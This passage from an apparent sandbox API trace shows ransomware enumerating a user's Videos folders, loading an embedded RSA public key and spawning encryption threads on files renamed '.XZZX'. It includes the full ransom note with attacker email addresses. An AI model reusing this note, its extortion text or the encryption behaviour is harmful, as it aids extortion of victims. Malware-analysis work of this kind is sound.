f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.029] lstrcpyW (in: lpString1=0x17be7c, lpString2="8181DC6820279A95628FB268245D7EDD.XZZX" | out: lpString1="8181DC6820279A95628FB268245D7EDD.XZZX") returned="8181DC6820279A95628FB268245D7EDD.XZZX" [0200.029] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdc4 [0200.029] Sleep (dwMilliseconds=0x96) [0200.184] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.184] lstrcmpW (lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpString2="..") returned 1 [0200.185] lstrcmpW (lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpString2=".") returned 1 [0200.185] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.185] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="ntldr") returned 0x0 [0200.185] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="NTLDR") returned 0x0 [0200.185] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.185] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.185] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0200.185] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") [0200.185] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.185] lstrcpyW (in: lpString1=0x17be7c, lpString2="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" | out: lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" [0200.185] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdc8 [0200.185] Sleep (dwMilliseconds=0x96) [0200.343] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.343] lstrcmpW (lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpString2="..") returned 1 [0200.343] lstrcmpW (lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpString2=".") returned 1 [0200.343] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.343] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="ntldr") returned 0x0 [0200.343] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="NTLDR") returned 0x0 [0200.343] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.343] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.343] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0200.343] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") [0200.344] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.344] lstrcpyW (in: lpString1=0x17be7c, lpString2="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" | out: lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" [0200.344] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdcc [0200.344] Sleep (dwMilliseconds=0x96) [0200.496] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.496] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.496] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0200.497] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0200.497] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0200.497] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0200.497] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0200.497] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0200.497] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0200.497] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*" [0200.497] SetErrorMode (uMode=0x1) returned 0x1 [0200.497] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT") returned 65 [0200.497] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0200.497] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0200.497] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xdd0) returned 0x0 [0200.497] RegQueryValueExW (in: hKey=0xdd0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b8aa8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43b8aa8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0200.497] RegCloseKey (hKey=0xdd0) returned 0x0 [0200.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0200.498] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0200.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdd0 [0200.498] CloseHandle (hObject=0xdd0) returned 1 [0200.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0200.498] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="Z-_06k" [0200.498] lstrcpyW (in: lpString1=0x17b644, lpString2="Z-_06k" | out: lpString1="Z-_06k") returned="Z-_06k" [0200.498] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0200.498] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0200.498] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.498] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0200.498] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.498] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.498] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.498] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.498] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.498] lstrcmpW (lpString1="wpc5n64XVm", lpString2="..") returned 1 [0200.498] lstrcmpW (lpString1="wpc5n64XVm", lpString2=".") returned 1 [0200.498] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0200.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpString2="wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0200.498] SetErrorMode (uMode=0x1) returned 0x1 [0200.498] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0200.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.498] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*" [0200.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0200.499] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="wpc5n64XVm" [0200.499] lstrcpyW (in: lpString1=0x17a5a4, lpString2="wpc5n64XVm" | out: lpString1="wpc5n64XVm") returned="wpc5n64XVm" [0200.499] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0200.499] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0200.499] lstrcmpW (lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpString2="..") returned 1 [0200.499] lstrcmpW (lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpString2=".") returned 1 [0200.499] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.499] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="ntldr") returned 0x0 [0200.499] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="NTLDR") returned 0x0 [0200.499] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.499] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.499] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0200.499] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") [0200.499] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.499] lstrcpyW (in: lpString1=0x17addc, lpString2="04BF022041D4F9A43C1202C84609DDEC.XZZX" | out: lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX") returned="04BF022041D4F9A43C1202C84609DDEC.XZZX" [0200.499] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdd8 [0200.499] Sleep (dwMilliseconds=0x96) [0200.652] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0200.652] lstrcmpW (lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpString2="..") returned 1 [0200.653] lstrcmpW (lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpString2=".") returned 1 [0200.653] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.653] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="ntldr") returned 0x0 [0200.653] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="NTLDR") returned 0x0 [0200.653] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.653] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.653] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0200.653] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") [0200.653] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.653] lstrcpyW (in: lpString1=0x17addc, lpString2="1CB22AF03A177B10110664B53E3C5F58.XZZX" | out: lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX") returned="1CB22AF03A177B10110664B53E3C5F58.XZZX" [0200.653] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xddc [0200.654] Sleep (dwMilliseconds=0x96) [0200.808] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0200.808] lstrcmpW (lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpString2="..") returned 1 [0200.808] lstrcmpW (lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpString2=".") returned 1 [0200.809] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.809] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="ntldr") returned 0x0 [0200.809] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="NTLDR") returned 0x0 [0200.809] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.809] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.809] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0200.809] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") [0200.809] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.809] lstrcpyW (in: lpString1=0x17addc, lpString2="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" | out: lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" [0200.809] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: 